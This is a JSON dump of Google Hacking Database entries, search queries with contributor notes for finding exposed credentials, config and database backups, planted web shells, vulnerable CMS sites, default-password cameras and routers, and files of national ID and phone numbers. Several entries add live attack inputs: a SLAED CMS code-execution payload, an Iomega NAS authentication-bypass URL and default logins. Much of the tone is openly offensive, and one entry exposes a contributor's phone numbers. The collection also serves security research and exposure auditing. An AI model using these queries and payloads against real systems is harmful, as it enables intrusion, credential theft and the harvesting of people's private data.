code, not the rendered page, butthe source itself. This is most commonly used on wordpress sites to grab thewp-config.php file to gain access to the database, but is not limited towordpress sites. 
I only list it as an example, so people understand theweight of flaw.- DigiP", "submited": "2011-08-25", "request": "allinurl:forcedownload.php?file=", "id": 3738}, {"short description": "filetype:ini \"Bootstrap.php\" (pass|passwd|password|pwd)", "long description": "Zend application ini, with usernames, passwords and db infoloveBastich", "submited": "2011-08-25", "request": "filetype:ini \"Bootstrap.php\" (pass|passwd|password|pwd)", "id": 3739}, {"short description": "\"Powered by SLAED CMS\"", "long description": "Exploit Title: Slaed CMS Code execOn different versions of this software next vulnerabilities are availible:/index.php?name=Search&mod=&word={${phpinfo()}}&query=ok&to=view/index.php?name=Search&mod=&word=ok&query={${phpinfo()}}&to=viewOR:/search.html?mod=&word={${phpinfo()}}&query=ok&to=view/search.html?mod=&word=ok&query={${phpinfo()}}&to=view", "submited": "2011-09-12", "request": "\"Powered by SLAED CMS\"", "id": 3740}, {"short description": "+intext:\"AWSTATS DATA FILE\" filetype:txt", "long description": "Shows data downloads containing statistics on the site.Made by AwstatsThe best dork for that system.By: 67pc", "submited": "2011-09-26", "request": "+intext:\"AWSTATS DATA FILE\" filetype:txt", "id": 3741}, {"short description": "inurl:ftp \"password\" filetype:xls", "long description": "this string may be used to find many low hanging fruit on FTP sites recently indexed by google. Author: Uhaba", "submited": "2011-09-26", "request": "inurl:ftp \"password\" filetype:xls", "id": 3742}, {"short description": "inurl:view.php?board1_sn=", "long description": "locates a webapp vulnerable to SQL injection", "submited": "2011-09-26", "request": "inurl:view.php?board1_sn=", "id": 3743}, {"short description": "inurl:\"amfphp/browser/servicebrowser.swf\"", "long description": "AMFPHP service browser, debug interface. 
Author: syddd", "submited": "2011-09-26", "request": "inurl:\"amfphp/browser/servicebrowser.swf\"", "id": 3744}, {"short description": "intitle:#k4raeL - sh3LL", "long description": "intitle:#k4raeL - sh3LLFinds K4rael Shell , though many of them are dead but we can get some andeven cache data can get you information , making website vulnerableAuthor: cyb3r.pr3dat0r", "submited": "2011-10-11", "request": "intitle:#k4raeL - sh3LL", "id": 3745}, {"short description": "filetype:php~ (pass|passwd|password|dbpass|db_pass|pwd)", "long description": "Backup or temp versions of php files containing you guessed it passwords orother ripe for the picking info...Author: Bastich", "submited": "2011-10-11", "request": "filetype:php~ (pass|passwd|password|dbpass|db_pass|pwd)", "id": 3746}, {"short description": "inurl:\"trace.axd\" ext:axd \"Application Trace\"", "long description": "example google dork to find trace.axd, a file used for debugging asp thatreveals full http request details like cookie and other data that in manycases can be used to hijack user-sessions, display plain-textusernames/passwords and also serverinfo like pathnamessecond with plain-text usernames and passwords along with sessiondata. thisfile should be developer-only and not publicly available but seems to beused quite often, usually hidden from google with robots.txt. Author: easypwn", "submited": "2011-11-19", "request": "inurl:\"trace.axd\" ext:axd \"Application Trace\"", "id": 3747}, {"short description": "inurl:\"/includes/config.php\"", "long description": "The Dork Allows you to get data base information from config files. Author: XeNon", "submited": "2011-11-19", "request": "inurl:\"/includes/config.php\"", "id": 3748}, {"short description": "intitle:index.of? configuration.php.zip", "long description": "this dork finds mostly backed up configuration.php files.Its possible to change the *.zip to *.txt or other file types.Author: Lord.TMR", "submited": "2011-11-19", "request": "intitle:index.of? 
configuration.php.zip", "id": 3749}, {"short description": "inurl:\"/Application Data/Filezilla/*\" OR inurl:\"/AppData/Filezilla/*\" filetype:xml", "long description": "this dork locates files containing ftp passwords", "submited": "2011-11-19", "request": "inurl:\"/Application Data/Filezilla/*\" OR inurl:\"/AppData/Filezilla/*\" filetype:xml", "id": 3750}, {"short description": "filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS", "long description": "this dork locates registry dumps", "submited": "2011-11-19", "request": "filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS", "id": 3751}, {"short description": "inurl:php intitle:\"Cpanel , FTP CraCkeR\"", "long description": "locates cpanel and ftp cracker. Author: alsa7r", "submited": "2011-11-19", "request": "inurl:php intitle:\"Cpanel , FTP CraCkeR\"", "id": 3752}, {"short description": "inurl:/xampp", "long description": "this dork looks for servers with xampp installed", "submited": "2011-11-19", "request": "inurl:/xampp", "id": 3753}, {"short description": "filetype:old (define)(DB_USER|DB_PASS|DB_NAME)", "long description": "this dork locates backed up config filesfiletype:php~ (define)(DB_USER|DB_PASS|DB_NAME)filetype:inc~ (define)(DB_USER|DB_PASS|DB_NAME)filetype:inc (define)(DB_USER|DB_PASS|DB_NAME)filetype:bak (define)(DB_USER|DB_PASS|DB_NAME)Author: Gerald J. Pottier III", "submited": "2011-11-24", "request": "filetype:old (define)(DB_USER|DB_PASS|DB_NAME)", "id": 3754}, {"short description": "filetype:old (mysql_connect) ()", "long description": "There are three of mysql_connects but that all search in .inc orwarnings, non search for .old . Dot old is something that all devs toto hide old files they do not want to delete immediatly but almostalways forget to delete. The server lang can be changed.:D--Gerald J. 
Pottier IIISenior Managed Systems Engineer :STG inc.Hereford, AZ 85615[Home] 520.843.0135[Work] 520.538.9684", "submited": "2011-11-24", "request": "filetype:old (mysql_connect) ()", "id": 3755}, {"short description": "filetype:php inanchor:c99 inurl:c99 intitle:c99shell -seeds -marijuana", "long description": "This search attempts to find the c99 backdoor that may be knowingly orunknowingly installed on servers. I have refined the search in hopes thatmore general talk about the backdoor, and also talk about the marijuanastrain does not pollute the results quite as much.Author: Teague Newman", "submited": "2011-11-24", "request": "filetype:php inanchor:c99 inurl:c99 intitle:c99shell -seeds -marijuana", "id": 3756}, {"short description": "filetype:php inurl:tiki-index.php +sirius +1.9.*", "long description": "Finds servers vulnerable to the CVE-2007-5423 exploit. Author: Matt Jones", "submited": "2011-11-25", "request": "filetype:php inurl:tiki-index.php +sirius +1.9.*", "id": 3757}, {"short description": "allintitle:\"UniMep Station Controller\"", "long description": "UniMep is a device for managing fuel station. You can see process offueling cars and you can make some changes in the setting.The default username/password is admin/setup. Author: WBR rigan", "submited": "2011-12-10", "request": "allintitle:\"UniMep Station Controller\"", "id": 3758}, {"short description": "inurl:/cgi-bin/makecgi-pro", "long description": "Brings up listings for Iomgea NAS devices.Password protected folders are susceptible to authentication bypass byadding the following to the url (after /cgi-bin/make-cgi-pro):?page_value=page_files&tab_value=%20&task_value=task_gotoPath&param1_value=(foldername)Common folders are music, movies, photos & public. Author: Matt Jones", "submited": "2011-12-12", "request": "inurl:/cgi-bin/makecgi-pro", "id": 3759}, {"short description": "\"My RoboForm Data\" \"index of\"", "long description": "This dork looks for Roboform password files. 
Author: Robert McCurdy", "submited": "2011-12-12", "request": "\"My RoboForm Data\" \"index of\"", "id": 3760}, {"short description": "filetype:sql inurl:wp-content/backup-*", "long description": "Search for WordPress MySQL database backup. Author: AngelParrot", "submited": "2011-12-14", "request": "filetype:sql inurl:wp-content/backup-*", "id": 3761}, {"short description": "Google Dork For Social Security Number ( In Spain and Argentina is D.N.I )", "long description": "This dork locates social security numbers. Author: Luciano UNLP", "submited": "2011-12-16", "request": "Google Dork For Social Security Number ( In Spain and Argentina is D.N.I )", "id": 3762}, {"short description": "Google Dork inurl:Curriculum Vitale filetype:doc ( Vital Informaticon , Addres, Telephone Numer, SSN , Full Name, Work , etc ) In Spanish.", "long description": "This dork locates Curriculum Vitale files. Author: Luciano UNLP", "submited": "2011-12-16", "request": "Google Dork inurl:Curriculum Vitale filetype:doc ( Vital Informaticon , Addres, Telephone Numer, SSN , Full Name, Work , etc ) In Spanish.", "id": 3763}, {"short description": "Microsoft-IIS/7.0 intitle:index.of name size", "long description": "IIS 7 directory listing. Author: huang", "submited": "2011-12-19", "request": "Microsoft-IIS/7.0 intitle:index.of name size", "id": 3764}, {"short description": "List of Phone Numbers (In XLS File ) allinurl:telefonos filetype:xls", "long description": "This is a dork for a list of Phone Private Numbers in Argentina. Author: Luciano UNLP", "submited": "2011-12-19", "request": "List of Phone Numbers (In XLS File ) allinurl:telefonos filetype:xls", "id": 3765}, {"short description": "inurl:.php intitle:- BOFF 1.0 intext:[ Sec. Info ]", "long description": "This search attempts to find the BOFF 1.0 Shell. Author: alsa7r", "submited": "2011-12-23", "request": "inurl:.php intitle:- BOFF 1.0 intext:[ Sec. 
Info ]", "id": 3766}, {"short description": "intitle:SpectraIV-IP", "long description": "Google dork for pelco SpectraIV-IP Dome Series camerasDefault username/password \"admin/admin\". Author: GhOsT-PR", "submited": "2011-12-26", "request": "intitle:SpectraIV-IP", "id": 3767}, {"short description": "\"Powered by kryCMS\"", "long description": "kryCMS Version 3.0 SQL Injection. Author: tempe_mendoan", "submited": "2011-12-26", "request": "\"Powered by kryCMS\"", "id": 3768}, {"short description": "allintext:D.N.I filetype:xls", "long description": "This Query contains sensitive data (D.N.I ;-) ) in a xls format (excel) and D.N.I for People of the Anses !Author: Luciano UNLP", "submited": "2011-12-27", "request": "allintext:D.N.I filetype:xls", "id": 3769}, {"short description": "(username=* | username:* |) | ( ((password=* | password:*) | (passwd=* | passwd:*) | (credentials=* | credentials:*)) | ((hash=* | hash:*) | (md5:* | md5=*)) | (inurl:auth | inurl:passwd | inurl:pass) ) filetype:log", "long description": "Logged username, passwords, hashesAuthor: GhOsT-PR", "submited": "2011-12-27", "request": "(username=* | username:* |) | ( ((password=* | password:*) | (passwd=* | passwd:*) | (credentials=* | credentials:*)) | ((hash=* | hash:*) | (md5:* | md5=*)) | (inurl:auth | inurl:passwd | inurl:pass) ) filetype:log", "id": 3770}, {"short description": "inurl:RgFirewallRL.asp | inurl:RgDmzHost.asp | inurl:RgMacFiltering.asp | inurl:RgConnect.asp | inurl:RgEventLog.asp | inurl:RgSecurity.asp | inurl:RgContentFilter.asp | inurl:wlanRadio.asp", "long description": "Gateway RoutersAuthor: GhOsT-PR", "submited": "2011-12-27", "request": "inurl:RgFirewallRL.asp | inurl:RgDmzHost.asp | inurl:RgMacFiltering.asp | inurl:RgConnect.asp | inurl:RgEventLog.asp | inurl:RgSecurity.asp | inurl:RgContentFilter.asp | inurl:wlanRadio.asp", "id": 3771}, {"short description": "inurl:cgi-bin/cosmobdf.cgi?", "long description": "COSMOView for building management. 
Author: GhOsT-PR", "submited": "2011-12-28", "request": "inurl:cgi-bin/cosmobdf.cgi?", "id": 3772}, {"short description": "inurl:\"mod.php?mod=blog\" intext:\"powered by DIY-CMS\"", "long description": "DIY-CMS blog mod SQL Injection. Author: snup", "submited": "2011-12-29", "request": "inurl:\"mod.php?mod=blog\" intext:\"powered by DIY-CMS\"", "id": 3773}, {"short description": "inurl:\"/showPlayer.php?id=\" intext:\"powered by ellistonSPORT\"", "long description": "ellistonSPORT Remote SQL Injection Vulnerability. Author: ITTIHACK", "submited": "2012-01-03", "request": "inurl:\"/showPlayer.php?id=\" intext:\"powered by ellistonSPORT\"", "id": 3774}, {"short description": "inurl:wp-content/plugins/age-verification/age-verification.php", "long description": "Wordpress Age Verification Pluginhttp://www.exploit-db.com/exploits/18350", "submited": "2012-01-10", "request": "inurl:wp-content/plugins/age-verification/age-verification.php", "id": 3775}, {"short description": "intitle:\"HtmlAnvView:D7B039C1\"", "long description": "This dork finds Wireless Security/Webcams that are accessible from theweb. The interesting part is that for some reason these cameras do notgenerally allow users to remove/change the default administrativeusername and pass. 
So in most cases you can view any camera that showsup in the google search.Default Username: admin01Default Password: 000000111111999999Author: Paul White", "submited": "2012-05-15", "request": "intitle:\"HtmlAnvView:D7B039C1\"", "id": 3776}, {"short description": "intext:\"~~Joomla1.txt\" title:\"Index of /\"", "long description": "intext:\"~~Joomla1.txt\" title:\"Index of /\"Get all server configs filesDiscovered by alsa7r", "submited": "2012-05-15", "request": "intext:\"~~Joomla1.txt\" title:\"Index of /\"", "id": 3777}, {"short description": "\"Welcome to Sitecore\" + \"License Holder\"", "long description": "Sitecore CMS detection.", "submited": "2012-05-15", "request": "\"Welcome to Sitecore\" + \"License Holder\"", "id": 3778}, {"short description": "intitle:\"-N3t\" filetype:php undetectable", "long description": "intitle:\"-N3t\" filetype:php undetectableSearch WebShell indexed on a page.--Joel Campusano Rojas.632 161 62@joelcampusanoIngeniero Civil en Informatica.", "submited": "2012-05-15", "request": "intitle:\"-N3t\" filetype:php undetectable", "id": 3779}, {"short description": "?intitle:index.of?\".mysql_history\"", "long description": "Find some juicy info in .mysql_history filesenjoybastich", "submited": "2012-05-15", "request": "?intitle:index.of?\".mysql_history\"", "id": 3780}, {"short description": "intitle:awen+intitle:asp.net", "long description": "Hi,This google dork exposes any already uploaded asp.net shells which areavailable in BackTrack.http://www.google.com/search?q=intitle:awen+intitle:asp.netThanks,Sagar Belure", "submited": "2012-05-15", "request": "intitle:awen+intitle:asp.net", "id": 3781}, {"short description": "\"mailing list memberships reminder\"", "long description": "Hi,By default, while subscribing to a mailing list on a website, runningMailman (GNU) for mailing list management, the user has got options tomanage his/her subscription options.There is an option of getting password reminder email for this listonce in a 
month.And, by default, this option is set to Yes.Along with sending the password reminder mail in *plain text* to theusers, it gets archived on the sites too.Thanks,Sagar Belure", "submited": "2012-05-15", "request": "\"mailing list memberships reminder\"", "id": 3782}, {"short description": "intext:\"Thank you for your purchase/trial of ALWIL Software products.:\"", "long description": "This dork can fetch you Avast product licenses especially Avast Antiviruses, including Professional editions ;)Author: gr00ve_hack3rwww.gr00ve-hack3r.com", "submited": "2012-05-15", "request": "intext:\"Thank you for your purchase/trial of ALWIL Software products.:\"", "id": 3783}, {"short description": "inurl:\"tiki-index.php\" filetype:php \"This is TikiWiki 1.9\"", "long description": "The server vulnerable to => CVE 2006-4602", "submited": "2012-05-15", "request": "inurl:\"tiki-index.php\" filetype:php \"This is TikiWiki 1.9\"", "id": 3784}, {"short description": "inurl:\"*.php?*=*.php\" intext:\"Warning: include\" -inurl:.html -site:\"php.net\" -site:\"stackoverflow.com\" -inurl:\"*forums*\"", "long description": "PHP Error Messages", "submited": "2012-05-15", "request": "inurl:\"*.php?*=*.php\" intext:\"Warning: include\" -inurl:.html -site:\"php.net\" -site:\"stackoverflow.com\" -inurl:\"*forums*\"", "id": 3785}, {"short description": "filetype:cfg \"radius\" (pass|passwd|password)", "long description": "Find config files with radius configs and passwords and secrets...LoveBastich", "submited": "2012-05-15", "request": "filetype:cfg \"radius\" (pass|passwd|password)", "id": 3786}, {"short description": "inurl:Settings.aspx intitle:Beyond TV", "long description": "Beyond TV gives you the capability to turn your PC into a high quality,digital video recorder (DVR). Most people use it for cable TV so thatthey don't have to spend rent money on a low end quality hardware DVRfrom their cable company. It's default config has no password orusername enabled. 
Very bad for people who connect their PCs directly totheir modems. I have Beyond TV and I was curious on how secure it is.", "submited": "2012-05-15", "request": "inurl:Settings.aspx intitle:Beyond TV", "id": 3787}, {"short description": "inurl:\"cgi-bin/webcgi/main\"", "long description": "inurl:\"cgi-bin/webcgi/main\"This dork finds indexed public facing Dell Remote Access Card.-n17r0u6", "submited": "2012-08-21", "request": "inurl:\"cgi-bin/webcgi/main\"", "id": 3788}, {"short description": "inurl:\"phpmyadmin/index.php\" intext:\"[ Edit ] [ Create PHP Code ] [ Refresh ]\"", "long description": "This dork finds unsecured databases", "submited": "2012-08-21", "request": "inurl:\"phpmyadmin/index.php\" intext:\"[ Edit ] [ Create PHP Code ] [ Refresh ]\"", "id": 3789}, {"short description": "inurl:\"passes\" OR inurl:\"passwords\" OR inurl:\"credentials\" -search -download -techsupt -git -games -gz -bypass -exe filetype:txt @yahoo.com OR @gmail OR @hotmail OR @rediff", "long description": "Hack the $cr1pt kiddies.There are a lot of Phishing pages hosted on internet , this dork willprovide you with their password files. 
Clean and Simplegr00ve_hack3rwww.gr00vehack3r.wordpress.com", "submited": "2012-08-21", "request": "inurl:\"passes\" OR inurl:\"passwords\" OR inurl:\"credentials\" -search -download -techsupt -git -games -gz -bypass -exe filetype:txt @yahoo.com OR @gmail OR @hotmail OR @rediff", "id": 3790}, {"short description": "filetype:docx Domain Registrar $user $pass", "long description": "Dork :- *filetype:docx Domain Registrar $user $pass*Use :- *To find domain login password for Registrar (can Hijack Domain)Submitted by : G00g!3 W@rr!0r*", "submited": "2012-08-21", "request": "filetype:docx Domain Registrar $user $pass", "id": 3791}, {"short description": "inurl:/app_dev.php/login \"Environment\"", "long description": "Search for login screen in web aplications developed with Symfony2 in a development environmentDaniel Maldonadohttp://caceriadespammers.com.ar", "submited": "2012-08-21", "request": "inurl:/app_dev.php/login \"Environment\"", "id": 3792}, {"short description": "intitle:\"hp laserjet\" inurl:info_configuration.htm", "long description": "HP LaserJet printers", "submited": "2012-08-21", "request": "intitle:\"hp laserjet\" inurl:info_configuration.htm", "id": 3793}, {"short description": "filetype:avastlic", "long description": "Lots of Avast Licenses .Author : gr00ve_hack3rwww.gr00vehack3r.wordpress.com", "submited": "2012-08-21", "request": "filetype:avastlic", "id": 3794}, {"short description": "intitle:\"Log In\" \"Access unsecured content without logging in\"", "long description": "iOmega Storcenter login page:intitle:\"Log In\" \"Access unsecured content without logging in\"Greetings,Alrik", "submited": "2012-08-21", "request": "intitle:\"Log In\" \"Access unsecured content without logging in\"", "id": 3795}, {"short description": "Please-logon \"intitle:zarafa webaccess \"", "long description": "Zarafa Webaccess logon pages.Greetings,Alrik.", "submited": "2012-08-21", "request": "Please-logon \"intitle:zarafa webaccess \"", "id": 3796}, {"short 
description": "\"CHARACTER_SETS\" \"COLLATION_CHARACTER_SET_APPLICABILITY\"", "long description": "\"CHARACTER_SETS\"+\"COLLATION_CHARACTER_SET_APPLICABILITY\"find sql injectable sitediscoverd by shinrisama", "submited": "2012-08-21", "request": "\"CHARACTER_SETS\" \"COLLATION_CHARACTER_SET_APPLICABILITY\"", "id": 3797}, {"short description": "intitle:\"DVR+Web+Client\"", "long description": "This dork will find most Linux-based DVR web clients that are accessible tothe web and through SSH. Linux-based DVR web clients are login portals forsurveillance web cameras wherein you can spy in other peoples cameras.*Default Usernames:* admin, guest, root*Default Passwords:* admin, guest, root*Author:* shipcode", "submited": "2012-08-21", "request": "intitle:\"DVR+Web+Client\"", "id": 3798}, {"short description": "site*.*.*/webalizer intitle:\"Usage Statistics\"", "long description": "Shows usage statistics of sites. Includes monthy reports on the IP addresses, user agents, and more, of the viewers of the sites, the most active first.", "submited": "2012-08-21", "request": "site*.*.*/webalizer intitle:\"Usage Statistics\"", "id": 3799}, {"short description": "intext:\"You may also donate through the Moneybookers account mb@dd-wrt\"", "long description": "Still find alot of equipment running v24 sp1", "submited": "2012-08-21", "request": "intext:\"You may also donate through the Moneybookers account mb@dd-wrt\"", "id": 3800}, {"short description": "intext:charset_test= email= default_persistent=", "long description": "find facebook email and password ;)", "submited": "2012-08-21", "request": "intext:charset_test= email= default_persistent=", "id": 3801}, {"short description": "'apc info' 'apc.php?SCOPE='", "long description": "This dork will locate Unsecured PHP APC Installations.With regards,Shubham Mittal(Hack Planet Technologies)http://hackplanet.in", "submited": "2012-08-21", "request": "'apc info' 'apc.php?SCOPE='", "id": 3802}, {"short description": "intext: intext: 
intext: intext: intext:", "long description": "More than 100k sites affectedIt will show asp sites that are vulnerable to sql injection(These links actually show pages which are attacked by mass SqlInjection...which means they are vulnerable to sql Injection)#Author----- pgolechaPalash Golechatwitter- @pgolecha12", "submited": "2012-08-21", "request": "intext: intext: intext: intext: intext:", "id": 3803}, {"short description": "ext:xml (\"mode_passive\"|\"mode_default\")", "long description": "OffSec:So the dork is:ext:xml (\"mode_passive\"|\"mode_default\")This dork finds Filezilla XML files. To be more specific;- recentservers.xml- sitemanager.xml- filezilla.xmlThese files contain clear text usernames and passwords. They also contain the hostname or IP to connect to as well as the port. Most of these results will be for FTP however, you can also get port 22 to SSH in. This dork of course can be modified to target a specific website by appending site:whateversite.com. You can also look for a specific username like root by appending \"root\" to the dork.Regards,necrodamushttp://www.twitter.com/necrodamus2600http://www.photobucket.com/profile/necrodamus2600", "submited": "2012-11-02", "request": "ext:xml (\"mode_passive\"|\"mode_default\")", "id": 3804}, {"short description": "filetype:xls \"username | password\"", "long description": "filetype:xls \"username | password\" This search reveals usernames and/or passwords of the xls documents.by Stakewinner00", "submited": "2012-11-02", "request": "filetype:xls \"username | password\"", "id": 3805}, {"short description": "inurl:ckfinder intext:\"ckfinder.html\" intitle:\"Index of /ckfinder\"", "long description": "Dork: inurl:ckfinder intext:\"ckfinder.html\" intitle:\"Index of /ckfinder\"Use this dork to find root directory of CKFinder (all versions) withckfinder.html file (used to upload, modify and delete files on the server)Submitted by: CodiObert", "submited": "2012-11-02", "request": "inurl:ckfinder 
intext:\"ckfinder.html\" intitle:\"Index of /ckfinder\"", "id": 3806}, {"short description": "intitle:Priv8 SCR", "long description": "I am Un0wn_XSymlink User configsintitle:Priv8 SCR", "submited": "2012-11-02", "request": "Re: intitle:Priv8 SCR", "id": 3807}, {"short description": "intitle:C0ded By web.sniper", "long description": "User & Domain || SymlinkUsing this dork you can find the User and the Domains of the Server...intitle:C0ded By web.sniperAuthor: Un0wn_X", "submited": "2012-11-02", "request": "intitle:C0ded By web.sniper", "id": 3808}, {"short description": "inurl:.com/configuration.php-dist", "long description": "Finds the configuration files of the PHP Database on the server.ByChintan GurjarRahul Tygi", "submited": "2012-11-02", "request": "inurl:.com/configuration.php-dist", "id": 3809}, {"short description": "intitle:\"Pyxis Mobile Test Page\" inurl:\"mpTest.aspx\"", "long description": "Pyxis Mobile Test Pageintitle:\"Pyxis Mobile Test Page\" inurl:\"mpTest.aspx\"", "submited": "2012-11-02", "request": "intitle:\"Pyxis Mobile Test Page\" inurl:\"mpTest.aspx\"", "id": 3810}, {"short description": "inurl:finger.cgi", "long description": "FingerSubmitted by: Christy Philip Mathew", "submited": "2012-11-02", "request": "inurl:finger.cgi", "id": 3811}, {"short description": "inurl:32400/web/index.html", "long description": "Submitting this for the GHDB. 
These are web accessible Plex Media Serverswhere you can watch/listen to other people's media collections.FYI", "submited": "2012-11-02", "request": "inurl:32400/web/index.html", "id": 3812}, {"short description": "\"parent directory\" proftpdpasswd intitle:\"index of\" -google", "long description": "This dork is based on this: http://www.exploit-db.com/ghdb/1212/but improved cause that is useless, instead of this:\"parent directory\" proftpdpasswd intitle:\"index of\" -googleBest regards,Nemesis", "submited": "2012-11-02", "request": "\"parent directory\" proftpdpasswd intitle:\"index of\" -google", "id": 3813}, {"short description": "intitle:\"dd-wrt info\" intext:\"Firmware: DD-WRT\"", "long description": "This dork finds web interfaces of various routers using custom firmware DD-WRT.Default login: rootDefault password: admingreetings, uA", "submited": "2012-11-02", "request": "intitle:\"dd-wrt info\" intext:\"Firmware: DD-WRT\"", "id": 3814}, {"short description": "inurl:\"/level/13|14|15/exec/\"", "long description": "inurl:\"/level/13|14|15/exec/\"Cisco IOS HTTP Auth Vulnerability .. Command before exec/ . 
Exampleexec/-/?", "submited": "2012-11-02", "request": "inurl:\"/level/13|14|15/exec/\"", "id": 3815}, {"short description": "inurl:\"r00t.php\"", "long description": "This dork finds websites that were hacked, backdoored and contains theirsystem information e.g: Linux web.air51.ru 2.6.32-41-server #89-UbuntuSMP Fri Apr 27 22:33:31 UTC 2012 x86_64.Jay Turla a.k.a shipcode", "submited": "2012-11-02", "request": "Re: inurl:\"r00t.php\"", "id": 3816}, {"short description": "inurl:\"/dbman/default.pass\"", "long description": "A path to a DES encrypted password for DBMan (http://www.gossamer-threads.com/products/archive.html) ranging from Guestto Admin account, this is often found coupled with cgi-telnet.pl (http://www.rohitab.com/cgi-telnet) which provides an admin login, bydefault and the password provided by DBMan's path /dbman/default.passI have already posted this to packetstorm on June 7th 2004, calledcgitelnetdbman (http://packetstormsecurity.org/files/29530/cgitelnetdbman.pdf.html)The 'Dork' is *inurl:\"/dbman/default.pass\" *Lawrence Lavigne (ratdance)-suidrewt", "submited": "2012-11-02", "request": "inurl:\"/dbman/default.pass\"", "id": 3817}, {"short description": "inurl:\"InfoViewApp/logon.jsp\"", "long description": "Google Hacking*SAP Business Object 3.1 XI*inurl:\"InfoViewApp/logon.jsp\"twitter@firebitsbr", "submited": "2012-11-02", "request": "inurl:\"InfoViewApp/logon.jsp\"", "id": 3818}, {"short description": "inurl:phpliteadmin.php", "long description": "The default password is 'admin'", "submited": "2012-11-02", "request": "inurl:phpliteadmin.php", "id": 3819}, {"short description": "inurl:\"Orion/SummaryView.aspx\" intext:\"Orion Core\"", "long description": "Hello,Enumerate Solarwinds Orion network monitoring portals. 
In some cases, theportal can be accessed without authenticating.-Sean", "submited": "2012-11-02", "request": "inurl:\"Orion/SummaryView.aspx\" intext:\"Orion Core\"", "id": 3820}, {"short description": "allinurl:\"User_info/auth_user_file.txt\"", "long description": "Google dork for find user info and configuration password of DCForumallinurl:\"User_info/auth_user_file.txt\"- Ajith Kp", "submited": "2012-11-05", "request": "allinurl:\"User_info/auth_user_file.txt\"", "id": 3821}, {"short description": "intext:\"Fatal error: Class 'Red_Action' not found in\"", "long description": "Dork to find Plugin errors in wordpress websitesDork - intext:\"Fatal error: Class 'Red_Action' not found in\"", "submited": "2012-12-06", "request": "intext:\"Fatal error: Class 'Red_Action' not found in\"", "id": 3822}, {"short description": "inurl:newsnab/www/ automated.config.php", "long description": "Usenet Accounts from Newsnab configsinurl:newsnab/www/ automated.config.phpAuthor: rmccurdy.comyay free newsgroup access !***********************************************************************The information in this email is confidential and may be legally privileged. It is intended solely for the addressee. Access to this email by anyone else is unauthorized. If you are not the intended recipient, any disclosure, copying, distribution or any action taken or omitted to be taken in reliance on it, is prohibited and may be unlawful. 
When addressed to our clients any opinions or advice contained in this email are subject to the terms and conditions expressed in the governing KPMG client engagement letter.***********************************************************************", "submited": "2012-12-06", "request": "inurl:newsnab/www/ automated.config.php", "id": 3823}, {"short description": "inurl:admin intext:username= AND email= AND password= OR pass= filetype:xls", "long description": "--nitish mehta", "submited": "2012-12-31", "request": "inurl:admin intext:username= AND email= AND password= OR pass= filetype:xls", "id": 3824}, {"short description": "you really should fix this security hole by setting a password for user '.root'. inurl:/phpmyadmin intitle:localhost", "long description": "Gives sites with default username root and no password--nitish mehta", "submited": "2012-12-31", "request": "you really should fix this security hole by setting a password for user '.root'. inurl:/phpmyadmin intitle:localhost", "id": 3825}, {"short description": "intext:SQL syntax & inurl:index.php?=id & inurl:gov & inurl:gov", "long description": "# Exploit Title: SQLI Exploit# Google Dork: intext:SQL syntax & inurl:index.php?=id & inurl:gov &inurl:gov# Date: 25/December/2012# Exploit Author: BeastarStealacar# Vendor Homepage: http://devil-zone.net/", "submited": "2012-12-31", "request": "intext:SQL syntax & inurl:index.php?=id & inurl:gov & inurl:gov", "id": 3826}, {"short description": "inurl:/wp-content/w3tc/dbcache/", "long description": "- Jay Townsend", "submited": "2012-12-31", "request": "inurl:/wp-content/w3tc/dbcache/", "id": 3827}, {"short description": "runtimevar softwareVersion=", "long description": "Hits: 807Config file from Thomson home routers, sometimes it contains password's anduser's encryptedContains ACS servers info from ISP's", "submited": "2013-02-05", "request": "runtimevar softwareVersion=", "id": 3828}, {"short description": "site:login.*.*", "long description": 
"DORK:site:login.*.*Description: Allow User To ViewLogin Panel Of Many WebSites..Author:MTKDATED: 13-1-1", "submited": "2013-02-05", "request": "site:login.*.*", "id": 3829}, {"short description": "inurl:/control/userimage.html", "long description": "Mobotix webcam search. yet another newer search", "submited": "2013-02-05", "request": "inurl:/control/userimage.html", "id": 3830}, {"short description": "ext:xml (\"proto='prpl-'\" | \"prpl-yahoo\" | \"prpl-silc\" | \"prpl-icq\")", "long description": "*Google Search:*https://www.google.com/search?q=ext:xml%20(%22proto='prpl-'%22%20|%20%22prpl-yahoo%22%20|%20%22prpl-silc%22%20|%20%22prpl-icq%22)*Description:*Find Accounds and Passwords from Pidgin Users.Google limit queries to 32 words so it?s impossible to search for allAccount-Types in one query!List of all Params: Feel free to build your own search query.proto='prpl-'; prpl-silc; prpl-simple; prpl-zephyr; prpl-bonjour;prpl-qq; prpl-meanwhile; prpl-novell; prpl-gg; prpl-myspace; prpl-msn;prpl-gtalk; prpl-icq; prpl-aim; prpl-yahoo; prpl-yahoojp; prpl-yah;prpl-irc; prpl-yabber*Author:* la.usch.io", "submited": "2013-02-05", "request": "ext:xml (\"proto='prpl-'\" | \"prpl-yahoo\" | \"prpl-silc\" | \"prpl-icq\")", "id": 3831}, {"short description": "ext:gnucash", "long description": "*Google Search:*http://www.google.com/search?q=ext:gnucash*Description:*Find Gnucash Databases containing juicy info.*Author:*http://la.usch.iohttps://www.twitter.com/la_usch--------------------------------------------------------CheersL@uschWeb: http://la.usch.ioTwitter: https://www.twitter.com/la_usch", "submited": "2013-02-05", "request": "ext:gnucash", "id": 3832}, {"short description": "filetype:inc OR filetype:bak OR filetype:old mysql_connect OR mysql_pconnect", "long description": "Aggregates previous mysql_(p)connect google dorks and adds a new filetype.Searches common file extensions used as backups by PHP developers. 
Theseextensions are normally not interpreted as code by their server, so theirdatabase connection credentials can be viewed in plaintext.- Andy G - twitter.com/vxhex", "submited": "2013-02-05", "request": "filetype:inc OR filetype:bak OR filetype:old mysql_connect OR mysql_pconnect", "id": 3833}, {"short description": "filetype:config inurl:web.config inurl:ftp", "long description": "This google dork to find sensitive information of MySqlServer , \"uid, andpassword\" in web.config through ftp..filetype:config inurl:web.config inurl:ftp-Altamimi", "submited": "2013-04-09", "request": "filetype:config inurl:web.config inurl:ftp", "id": 3834}, {"short description": "allintext: \"Please login to continue...\" \"ZTE Corporation. All rights reserved.\"", "long description": "Reported by: Jasper Briels", "submited": "2013-04-09", "request": "allintext: \"Please login to continue...\" \"ZTE Corporation. All rights reserved.\"", "id": 3835}, {"short description": "\"index of\" inurl:root intitle:symlink", "long description": "Google Dork: index of\" inurl:root intitle:symlinkSteal Others SymlinkAuthor: Un0wn_X", "submited": "2013-04-09", "request": "\"index of\" inurl:root intitle:symlink", "id": 3836}, {"short description": "\"index of\" inurl:sym", "long description": "Google Dork: \"index of\" inurl:symYou can Steal the 